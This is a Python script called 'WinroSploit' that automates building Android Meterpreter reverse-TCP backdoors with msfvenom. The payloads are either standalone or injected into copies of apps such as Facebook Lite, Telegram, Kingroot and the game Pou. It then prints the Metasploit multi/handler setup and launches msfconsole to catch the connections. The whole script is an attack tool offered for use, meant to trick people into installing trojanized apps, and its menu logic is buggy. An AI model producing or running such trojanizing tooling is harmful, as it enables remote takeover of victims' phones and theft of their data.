import time
import os
from colorama import Fore, Back, Style
print(Fore.GREEN+"")
os.system("clear")
os.system("pip3 install colorama")
time.sleep(2)
os.system("clear")
os.system("apt update")
os.system("clear")
time.sleep(3)
print(Fore.BLUE+"__        ___                   ____        _       _ _  ")
print(Fore.BLUE+"\ \      / (_)_ __  _ __ ___   / ___| _ __ | | ___ (_) |_")
print(Fore.BLUE+" \ \ /\ / /| | '_ \| '__/ _ \  \___ \| '_ \| |/ _ \| | __|")
print(Fore.BLUE+"  \ V  V / | | | | | | | (_) |  ___) | |_) | | (_) | | |_ ")
print(Fore.BLUE+"   \_/\_/  |_|_| |_|_|  \___/  |____/| .__/|_|\___/|_|\__|")
print(Fore.BLUE+"                                     |_|  ver:0.1               ")
print("")
print("[0] Help")
print("[1] BUild MainActivity msf")
print("[2] Applications available in WinroSploit")
print("[3] Build app connect to MainActivity")
print("")
v=int(input("-> "))
time.sleep(3)
if v == 1:
    os.system("clear")
    print(Fore.GREEN+"[=================================]")
    print(Fore.BLUE+"start metasploit run to server...")
    print(Fore.GREEN+"[=================================]")
    time.sleep(2)
    print(Fore.GREEN+"[===============================[✓]")
    print("")
    print(Fore.GREEN+"Please wait...")
    time.sleep(2)
    print("Coonect to metasploit...[✓]")
    time.sleep(1)
    print("Starting...")
    print(Fore.BLUE+"")
    time.sleep(2)
    print("")
    print("Please wait...")
    print("")
    os.system("msfvenom -p android/meterpreter/reverse_tcp LHOST=Enter your ip address LPORT=4444 R > winrosploit.apk")
    print("===================[✓]==================")
    print(Fore.GREEN+"")
    time.sleep(5)
    os.system("clear")
    print("Please wait...")
    time.sleep(2)
    print("")
    print("==========================================================================")
    print("msf6 > use exploit/multi/handler")
    print("msf6 exploit(multi/handler) >  set payload android/meterpreter/reverse_tcp")
    print("msf6 exploit(multi/handler) > set LHOST Enter address ip")
    print("msf6 exploit(multi/handler) > set LPORT 4444")
    print("msf6 exploit(multi/handler) > run or exploit")
    print("==========================================================================")
    print("")
    os.system("msfconsole")
else:
    print(Fore.RED+"========================")
    print(Fore.RED+"Error in build")
    print("Enter 0 ")
    print(Fore.RED+"========================")

if v == 0:
    os.system("clear")
    print(Fore.YELLOW+"========================help winro sploit========================")
    print("If in the program with:")
    print("=================")
    print("Construction error")
    print("Enter 0")
    print("=================")
    print("You are so wrong that everyone has this problem. The only solution to this problem is the winrosploit.py file.")
    print("Open and all parts that")
    print("Enter your IP address")
    print("Enter your ip to fix the problem.")
else:
    print(Fore.RED+"error")

if v == 2:
    os.system("clear")
    print(Fore.BLUE+" __  __            _        _")   
    print("|  \/  | __ _ _ __| | _____| |_ ")
    print("| |\/| |/ _` | '__| |/ / _ \ __|")
    print("| |  | | (_| | |  |   <  __/ |_ ")
    print("|_|  |_|\__,_|_|  |_|\_\___|\__|")
                                    
    print("__        ___                ____        _       _ _ ")  
    print("\ \      / (_)_ __  _ __ ___/ ___| _ __ | | ___ (_) |_ ")
    print(" \ \ /\ / /| | '_ \| '__/ _ \___ \| '_ \| |/ _ \| | __|")
    print("  \ V  V / | | | | | | | (_) |__) | |_) | | (_) | | |_ ")
    print("   \_/\_/  |_|_| |_|_|  \___/____/| .__/|_|\___/|_|\__|")
    print("                                  |_| ")
    print("")
    print("[1] fasbook lite")
    print("[2] Kingroot")
    print("[3] telegram")
    print("[4] map")
    print("[5] xpriabazar")
    print("[6] game pou")
    print("")

if v == 3:
    os.system("clear")
    os.system("apt install apktool")
    os.system("clear")
    print(Fore.BLUE+" __  __      _           _              _           _     _ ")
    print("|  \/  | ___| |_ __ _   / \   _ __   __| |_ __ ___ (_) __| |")
    print("| |\/| |/ _ \ __/ _` | / _ \ | '_ \ / _` | '__/ _ \| |/ _` |")
    print("| |  | |  __/ || (_| |/ ___ \| | | | (_| | | | (_) | | (_| |")
    print("|_|  |_|\___|\__\__,_/_/   \_\_| |_|\__,_|_|  \___/|_|\__,_|")
    print("")
    print("[1] fasbook lite")
    print("[2] Kingroot")
    print("[3] telegram")
    print("[4] map")
    print("[5] xpriabazar")
    print("[6] game pou")
    print("")
    vorodemeta=int(input("Enter your number >"))
    if vorodemeta == 1:
        os.system("clear")
        os.system("chmod +x apktool.jar")
        os.system("chmod +x apktool")
        os.system("sudo cp apktool /usr/local/bin")
        os.system("sudo cp apktool.jar /usr/local/bin")
        os.system("sudo apt install zipalign")
        os.system("sudo apt-get install openjdk-11-jdk")
        os.system("clear")
        print(Fore.GREEN+"Please wait...")
        time.sleep(2)
        print("connect to server...")
        time.sleep(2)
        print("===================[✓]")
        print("run metasploit...")
        time.sleep(3)
        print("===============[✓]")
        print("")
        os.system("clear")
        print("========================build app fasbooklite====================")
        os.system("msfvenom -x fasbook.apk -p android/meterpreter/reverse_tcp LHOST=1Enter your ip address LPORT=4444 -o FasbookLite.apk")
        print(Fore.GREEN+"=============================download app [✓]====================")
        time.sleep(3)
        os.system("clear")
        print("Please wait...")
        time.sleep(2)
        print(Fore.GREEN+"")
        print("==========================================================================")
        print("msf6 > use exploit/multi/handler")
        print("msf6 exploit(multi/handler) >  set payload android/meterpreter/reverse_tcp")
        print("msf6 exploit(multi/handler) > set LHOST Enter address ip")
        print("msf6 exploit(multi/handler) > set LPORT 4444")
        print("msf6 exploit(multi/handler) > run or exploit")
        print("==========================================================================")
        print("")
        os.system("msfconsole")
    if vorodemeta == 2:
        os.system("clear")
        os.system("chmod +x apktool.jar")
        os.system("chmod +x apktool")
        os.system("sudo cp apktool /usr/local/bin")
        os.system("sudo cp apktool.jar /usr/local/bin")
        os.system("sudo apt install zipalign")
        os.system("sudo apt-get install openjdk-11-jdk")
        os.system("clear")
        print(Fore.GREEN+"Please wait...")
        time.sleep(2)
        print("connect to server...")
        time.sleep(2)
        print("===================[✓]")
        print("run metasploit...")
        time.sleep(3)
        print("===============[✓]")
        print("")
        os.system("clear")
        print("========================build app kingroot====================")
        os.system("msfvenom -x kingroot.apk -p android/meterpreter/reverse_tcp LHOST=Enter your ip address LPORT=4444 -o Kingroot.apk")
        print(Fore.GREEN+"=============================download app [✓]====================")
        time.sleep(3)
        os.system("clear")
        print("Please wait...")
        time.sleep(2)
        print(Fore.GREEN+"")
        print("==========================================================================")
        print("msf6 > use exploit/multi/handler")
        print("msf6 exploit(multi/handler) >  set payload android/meterpreter/reverse_tcp")
        print("msf6 exploit(multi/handler) > set LHOST Enter address ip")
        print("msf6 exploit(multi/handler) > set LPORT 4444")
        print("msf6 exploit(multi/handler) > run or exploit")
        print("==========================================================================")
        print("")
        os.system("msfconsole")
    if vorodemeta == 3:
        os.system("clear")
        os.system("chmod +x apktool.jar")
        os.system("chmod +x apktool")
        os.system("sudo cp apktool /usr/local/bin")
        os.system("sudo cp apktool.jar /usr/local/bin")
        os.system("sudo apt install zipalign")
        os.system("sudo apt-get install openjdk-11-jdk")
        os.system("clear")
        print(Fore.GREEN+"Please wait...")
        time.sleep(2)
        print("connect to server...")
        time.sleep(2)
        print("===================[✓]")
        print("run metasploit...")
        time.sleep(3)
        print("===============[✓]")
        print("")
        os.system("clear")
        print("========================build app telegram====================")
        os.system("msfvenom -x telegram.apk -p android/meterpreter/reverse_tcp LHOST=1Enter your ip address LPORT=4444 -o Telegram.apk")
        print(Fore.GREEN+"=============================download app [✓]====================")
        time.sleep(3)
        os.system("clear")
        print("Please wait...")
        time.sleep(2)
        print(Fore.GREEN+"")
        print("==========================================================================")
        print("msf6 > use exploit/multi/handler")
        print("msf6 exploit(multi/handler) >  set payload android/meterpreter/reverse_tcp")
        print("msf6 exploit(multi/handler) > set LHOST Enter address ip")
        print("msf6 exploit(multi/handler) > set LPORT 4444")
        print("msf6 exploit(multi/handler) > run or exploit")
        print("==========================================================================")
        print("")
        os.system("msfconsole")
    if vorodemeta == 4:
        os.system("clear")
        os.system("chmod +x apktool.jar")
        os.system("chmod +x apktool")
        os.system("sudo cp apktool /usr/local/bin")
        os.system("sudo cp apktool.jar /usr/local/bin")
        os.system("sudo apt install zipalign")
        os.system("sudo apt-get install openjdk-11-jdk")
        os.system("clear")
        print(Fore.GREEN+"Please wait...")
        time.sleep(2)
        print("connect to server...")
        time.sleep(2)
        print("===================[✓]")
        print("run metasploit...")
        time.sleep(3)
        print("===============[✓]")
        print("")
        os.system("clear")
        print("========================build app map====================")
        os.system("msfvenom -x map.apk -p android/meterpreter/reverse_tcp LHOST=Enter your ip address LPORT=4444 -o Map.apk")
        print(Fore.GREEN+"=============================download app [✓]====================")
        time.sleep(3)
        os.system("clear")
        print("Please wait...")
        time.sleep(2)
        print(Fore.GREEN+"")
        print("==========================================================================")
        print("msf6 > use exploit/multi/handler")
        print("msf6 exploit(multi/handler) >  set payload android/meterpreter/reverse_tcp")
        print("msf6 exploit(multi/handler) > set LHOST Enter address ip")
        print("msf6 exploit(multi/handler) > set LPORT 4444")
        print("msf6 exploit(multi/handler) > run or exploit")
        print("==========================================================================")
        print("")
        os.system("msfconsole")
    if vorodemeta == 5:
        os.system("clear")
        os.system("chmod +x apktool.jar")
        os.system("chmod +x apktool")
        os.system("sudo cp apktool /usr/local/bin")
        os.system("sudo cp apktool.jar /usr/local/bin")
        os.system("sudo apt install zipalign")
        os.system("sudo apt-get install openjdk-11-jdk")
        os.system("clear")
        print(Fore.GREEN+"Please wait...")
        time.sleep(2)
        print("connect to server...")
        time.sleep(2)
        print("===================[✓]")
        print("run metasploit...")
        time.sleep(3)
        print("===============[✓]")
        print("")
        os.system("clear")
        print("========================build app xpriabazar====================")
        os.system("msfvenom -x xpriabazar.apk -p android/meterpreter/reverse_tcp LHOST=Enter your ip address LPORT=4444 -o Xpriabazar.apk")
        print(Fore.GREEN+"=============================download app [✓]====================")
        time.sleep(3)
        os.system("clear")
        print("Please wait...")
        time.sleep(2)
        print(Fore.GREEN+"")
        print("==========================================================================")
        print("msf6 > use exploit/multi/handler")
        print("msf6 exploit(multi/handler) >  set payload android/meterpreter/reverse_tcp")
        print("msf6 exploit(multi/handler) > set LHOST Enter address ip")
        print("msf6 exploit(multi/handler) > set LPORT 4444")
        print("msf6 exploit(multi/handler) > run or exploit")
        print("==========================================================================")
        print("")
        os.system("msfconsole")
    if vorodemeta == 6:
        os.system("clear")
        os.system("chmod +x apktool.jar")
        os.system("chmod +x apktool")
        os.system("sudo cp apktool /usr/local/bin")
        os.system("sudo cp apktool.jar /usr/local/bin")
        os.system("sudo apt install zipalign")
        os.system("sudo apt-get install openjdk-11-jdk")
        os.system("clear")
        print(Fore.GREEN+"Please wait...")
        time.sleep(2)
        print("connect to server...")
        time.sleep(2)
        print("===================[✓]")
        print("run metasploit...")
        time.sleep(3)
        print("===============[✓]")
        print("")
        os.system("clear")
        print("========================build app game pou====================")
        os.system("msfvenom -x gamepou.apk -p android/meterpreter/reverse_tcp LHOST=Enter your ip address LPORT=4444 -o Gamepou.apk")
        print(Fore.GREEN+"=============================download app [✓]====================")
        time.sleep(3)
        os.system("clear")
        print("Please wait...")
        time.sleep(2)
        print(Fore.GREEN+"")
        print("==========================================================================")
        print("msf6 > use exploit/multi/handler")
        print("msf6 exploit(multi/handler) >  set payload android/meterpreter/reverse_tcp")
        print("msf6 exploit(multi/handler) > set LHOST Enter address ip")
        print("msf6 exploit(multi/handler) > set LPORT 4444")
        print("msf6 exploit(multi/handler) > run or exploit")
        print("==========================================================================")
        print("")
        os.system("msfconsole")
























        
